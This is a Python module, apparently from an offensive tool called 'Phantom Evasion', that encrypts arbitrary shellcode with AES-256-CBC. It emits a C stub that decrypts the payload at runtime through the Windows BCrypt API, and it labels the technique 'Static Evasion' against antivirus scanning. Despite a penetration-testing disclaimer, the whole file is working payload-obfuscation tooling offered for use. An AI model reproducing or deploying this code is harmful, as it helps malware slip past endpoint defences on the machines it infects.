"""
Phantom Evasion - AES-256-CBC Encryption Technique

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

import os
from typing import Dict, Any

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad


def generate_aes_encryption(shellcode: bytes) -> Dict[str, Any]:
    """AES-256-CBC encrypt *shellcode* and generate a BCrypt-based C decryption stub.

    Returns a dict containing:
        - ``code``               – C source with encrypted data + BCrypt decrypt stub
        - ``encrypted_shellcode`` – ciphertext bytes
        - ``key``                – 32-byte AES key
        - ``iv``                 – 16-byte IV
        - ``description``        – human-readable technique summary
        - ``layer``              – defensive layer label
        - ``name``               – technique name
    """
    key = os.urandom(32)   # AES-256
    iv = os.urandom(16)
    cipher = AES.new(key, AES.MODE_CBC, iv)
    encrypted = cipher.encrypt(pad(shellcode, AES.block_size))

    sc_array = ", ".join(f"0x{b:02x}" for b in encrypted)
    key_array = ", ".join(f"0x{b:02x}" for b in key)
    iv_array = ", ".join(f"0x{b:02x}" for b in iv)

    code = f"""\
// AES-256-CBC Decryption using Windows BCrypt API – generated by Phantom Evasion
// Layer 1 – Static Evasion
#ifndef __PHANTOM_AES_DEFINED__
#define __PHANTOM_AES_DEFINED__

static unsigned char aes_key[] = {{{key_array}}};
static unsigned char aes_iv[]  = {{{iv_array}}};
static unsigned char encrypted_shellcode[] = {{{sc_array}}};
static DWORD shellcode_enc_len = {len(encrypted)};

static BOOL aes_decrypt(unsigned char *data, DWORD data_len,
                         unsigned char *key, unsigned char *iv,
                         unsigned char **decrypted, DWORD *decrypted_len) {{
    BCRYPT_ALG_HANDLE hAlg  = NULL;
    BCRYPT_KEY_HANDLE hKey  = NULL;
    NTSTATUS status;
    DWORD cbKeyObj = 0, cbData = 0;
    PBYTE pbKeyObj = NULL;

    status = BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0);
    if (!BCRYPT_SUCCESS(status)) return FALSE;

    BCryptSetProperty(hAlg, BCRYPT_CHAINING_MODE,
                      (PBYTE)BCRYPT_CHAIN_MODE_CBC,
                      sizeof(BCRYPT_CHAIN_MODE_CBC), 0);
    BCryptGetProperty(hAlg, BCRYPT_OBJECT_LENGTH,
                      (PBYTE)&cbKeyObj, sizeof(DWORD), &cbData, 0);

    pbKeyObj = (PBYTE)HeapAlloc(GetProcessHeap(), 0, cbKeyObj);
    if (!pbKeyObj) {{ BCryptCloseAlgorithmProvider(hAlg, 0); return FALSE; }}

    BCryptGenerateSymmetricKey(hAlg, &hKey, pbKeyObj, cbKeyObj, key, 32, 0);

    UCHAR iv_copy[16];
    memcpy(iv_copy, iv, 16);

    // First call: obtain output size
    BCryptDecrypt(hKey, data, data_len, NULL, iv_copy, 16,
                  NULL, 0, decrypted_len, BCRYPT_BLOCK_PADDING);

    *decrypted = (unsigned char*)HeapAlloc(GetProcessHeap(), 0, *decrypted_len);
    if (!*decrypted) {{
        BCryptDestroyKey(hKey);
        BCryptCloseAlgorithmProvider(hAlg, 0);
        HeapFree(GetProcessHeap(), 0, pbKeyObj);
        return FALSE;
    }}

    memcpy(iv_copy, iv, 16);   // restore IV for second call
    status = BCryptDecrypt(hKey, data, data_len, NULL, iv_copy, 16,
                           *decrypted, *decrypted_len, decrypted_len,
                           BCRYPT_BLOCK_PADDING);

    BCryptDestroyKey(hKey);
    BCryptCloseAlgorithmProvider(hAlg, 0);
    HeapFree(GetProcessHeap(), 0, pbKeyObj);
    return BCRYPT_SUCCESS(status);
}}

#endif /* __PHANTOM_AES_DEFINED__ */
"""

    return {
        "code": code,
        "encrypted_shellcode": encrypted,
        "key": key,
        "iv": iv,
        "description": "AES-256-CBC encryption with Windows BCrypt decryption stub",
        "layer": "Layer 1 - Static Evasion",
        "name": "aes_encrypt",
    }
